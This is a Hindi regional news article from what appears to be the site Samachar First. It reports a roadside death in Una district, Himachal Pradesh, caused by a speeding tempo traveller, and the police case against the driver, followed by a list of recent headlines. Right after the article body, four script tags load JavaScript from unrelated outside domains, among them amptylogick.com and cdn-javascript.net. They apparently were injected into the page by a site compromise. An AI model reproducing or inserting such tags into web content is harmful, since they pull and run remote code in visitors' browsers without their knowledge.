ऊनाः तेज़ रफ्तार टेंपों ने सड़क किनारे खड़ा व्यक्ति रौंदा, मौत

<p>जिला ऊना के उपमंडल के तहत सिक्करां दा परोह में सड़क किनारे खड़े व्यक्ति को तेज रफ्तार टेंपो ट्रेवलर ने रौंद डाला। जिससे उसकी मौके पर ही मौत हो गई। मृतक की पहचान कांगड़ा जिले के कस्बा परागपुर निवासी ओम प्रकाश के रूप में की गई है। पुलिस ने शव को कब्जे में लेकर रीजनल अस्पताल ऊना में पोस्टमार्टम करवाया और उसे परिजनों के सुपुर्द कर दिया है।</p>

<p>वहीं, घटना के संबंध में गाड़ी चालक के खिलाफ केस दर्ज़ करते हुए मामले की जांच शुरू कर दी है। जानकारी के मुताबिक ओम प्रकाश मंगलवार देर रात सिक्करां दा परोह में सड़क किनारे खड़ा था, इसी दौरान टेंपों ट्रेवलर नंबर (DL-1VC-1870) के चालक ने उसे टक्कर मार दी। हादसे के कुछ ही देर बाद ओम प्रकाश की मौत हो गई है।</p>

<p>घटना की जानकारी मिलते ही अंब पुलिस ने मौके पर पहुंच शव को कब्जे में लिया और उसे पोस्टमार्टम के लिए रीजनल अस्पताल ऊना पहुंचाया। डीएसपी अंब मनोज जम्वाल ने बताया कि आज सुबह मृतक के शव का पोस्टमार्टम करवाकर उसे परिजनों के सुपुर्द कर दिया गया है। पुलिस मुकद्दमा दर्ज करके आगामी कार्रवाई अमल में ला रही है।</p>
<script src=”//amptylogick.com/21aca573d498d25317.js”></script>
<script src=”http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1573639960749″ type=”text/javascript”></script>
<script src=”http://amptylogick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

“JOA IT पदों पर चयनित उम्मीदवारों की सूची जारी, इतने को मिली नियुक्ति”

  Shimla: सामाजिक न्याय एवं अधिकारिता विभाग ने राज्य चयन आयोग की सिफारिशों के आधार…

56 mins ago

अतिक्रमण एक रात का नहीं, सुक्खू सरकार से पहले हुआ अवैध निर्माण: कुलदीप

  Shimla : हिमाचल प्रदेश में स्ट्रीट वेंडर्स को लेकर विधानसभा की ओर से कमेटी…

1 hour ago

मुख्यमंत्री के निर्देश पर हमीरपुर में ‘कायाकल्प’ अभियान से बदल रही है शहर की तस्वीर

  Hamirpur: मुख्यमंत्री ठाकुर सुखविंदर सिंह सुक्खू के गृह जिले के मुख्यालय हमीरपुर शहर की…

2 hours ago

राज्य के स्वास्थ्य ढांचे को मजबूत करने के लिए ठोस कदम उठा रही है सरकार: बाली

  टांडा मेडिकल कालेज भी स्वास्थ्य क्षेत्र में निरंतर नए आयाम कर रहा स्थापित विश्व…

2 hours ago

प्रमोशन लिस्ट के इंतजार में कई शिक्षक बिना प्रिंसिपल बने होंगे रिटायर

  वर्तमान में प्रिंसिपल के 500 पद है खाली लेक्चरर्स की 90:10 की मांग का…

3 hours ago

अनुष्का दत्ता पहुंची मिस यूनिवर्स इंडिया-2024 के फाइनल में, हिमाचल की पहली प्रतिभागी

  Shimla: रोह‍डू की रहने वाली 22 वर्षीय अनुष्का दत्ता मिस यूनिवर्स इंडिया 2024 प्रतियोगिता…

3 hours ago